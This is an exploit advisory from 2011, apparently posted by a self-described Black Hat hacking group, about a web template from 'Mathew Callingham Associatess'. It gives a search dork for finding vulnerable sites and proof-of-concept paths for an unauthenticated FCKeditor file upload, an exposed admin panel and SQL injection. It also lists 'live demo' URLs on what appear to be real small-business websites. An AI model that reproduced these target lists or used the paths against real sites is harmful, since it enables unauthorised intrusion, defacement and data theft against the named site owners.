========================================================================= Mathew Callingham Associatess 3.x.x Multiple Vulnerability ========================================================================== [+]Title :.......Mathew Callingham Associatess 3.x.x Multiple Vulnerability [+]Author :......Net.Edit0r [+]Tested on :...Linux/PHP --------------------------------------------------------------------------- [~] Founded by Net.Edit0r [~] Team: Black Hat Group #BHG [~] Contact: Black.hat.tm@Gmail.Com [~] Home: http://Black-HG.Org [~] Vendor: http://designer-website.com/ [~] Category: Web Apps ==========ExPl0iT3d by Net.Edit0r========== [+] DORK: "Designed by Mathew Callingham Associates" [ I ]. Multiple Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: The security problem in the directory "admin" has been created. [P0C]: http://127.0.0.1/admin/editor/filemanager/upload/test.html [P0C]: http://127.0.0.1/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php [P0C]: http://127.0.0.1/admin/ Admin PaneL Edite Page ! [P0C]: http://127.0.0.1/viewclassified.php?classified=[SQL] [L!v3 D3m0's]: http://www.stockton-dancing.co.uk/admin/ <> 1 http://www.1pricepcrepairs.com/admin/ <> 1 http://platinumbuilders.co.uk/admin/editor/filemanager/upload/test.html <> 2 http://www.holbro.net/admin/editor/filemanager/upload/test.html <> 2 http://www.carpfishingtips.co.uk/viewclassified.php?classified=15 [SQL] <> 3 http://www.dcs-paving.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php <> 4 http://www.stockton-dancing.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php <> 4 +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+] TIME TABLE: 20 May 2011 - Vulnerability discovered. 21 May 2011 - Advisory released. =========================================================================================== [!] Black Hat Group ./Iranian HackerZ =========================================================================================== [!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net =========================================================================================== [!] Greetz To : DarkCoder | Amir-MaGiC | 3H34N | H3x | D3adlY & All Iranian HackerZ =========================================================================================== [!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 | Cho0bin And All My Friendz =========================================================================================== [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People ===========================================================================================